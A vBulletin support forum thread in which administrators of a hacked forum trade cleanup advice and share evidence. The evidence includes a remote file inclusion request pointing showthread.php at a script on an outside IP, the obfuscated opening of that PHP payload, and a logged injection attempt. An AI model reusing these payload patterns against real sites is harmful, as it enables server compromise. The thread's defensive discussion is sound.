|
Just disable the plugin/hook system and re-upload all vBulletin non-image files. This will then make your forums use to the vBulletin core code.
|
If the login to the server was changed, it indicates an issue with the server, not vBulletin.
|
Quote:
I remove this hacks today because they was in both of my site so i think one of them maybe was the way he find in . inferno shout box login as user arcade google search tag who is on chat hide hack trying to be safe and not sorry . the hacker and me been at war for days today seen he give up or took a day off . is there any way I can hide with a password the follow tools from admincp : generate email list email members forum manager |
update
we change all server password ,vbulletin password ,we change location of admincp and remove links from forum to admincp (only site owner and i know link ),we hire a server tech to harden server ,we disable all hacks ,reupload vb original files and this guys still can log as post as anyone from staff . I change my password everyday and still can post as me too . any ideas where else to look ? |
Are you sure they haven't uploaded any malicious files?
|
Quote:
OK i will delete everything on server except for sql ,avatars,profiles picture attachment and a few php file I wrote my self (extra pages) and will re upload all vb files . to make sure that no file we did not upload is there . |
I have a guest on my site that is viewing an error message. This is the guests location:
/forums/showthread. php?t = http://64.15.67.17/~calebsbi/logo.jpg I added some spaces, not sure if posting the link is OK here or not, but it is not a link to a .jpg, it is some type of script. I reported abuse to the host of the account, so I am not sure how long the link will work for. Here is how it starts out. I am removing the first character so it will show here. (I hope) ? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0); error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9); return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9)); return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po" It's a pretty long script. ~Chuck |
I guess thos was a failed attempt to do a XSS attack on your forum.
|
Thanks for the reply Marco. I am guessing it may have been a bot as it stayed around for hours, even after I turned off the Forums for an hour.
~Chuck |
i find this on my logs after hacker try again maybe someone could tell me if he trying a injection and how to block it.
Code:
2008-08-05, 14:25:57, 1217946357, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) |
| All times are GMT. The time now is 12:11 AM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
| X vBulletin 3.8.12 by vBS Debug Information | |
|---|---|
|
|
 More Information |
|
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|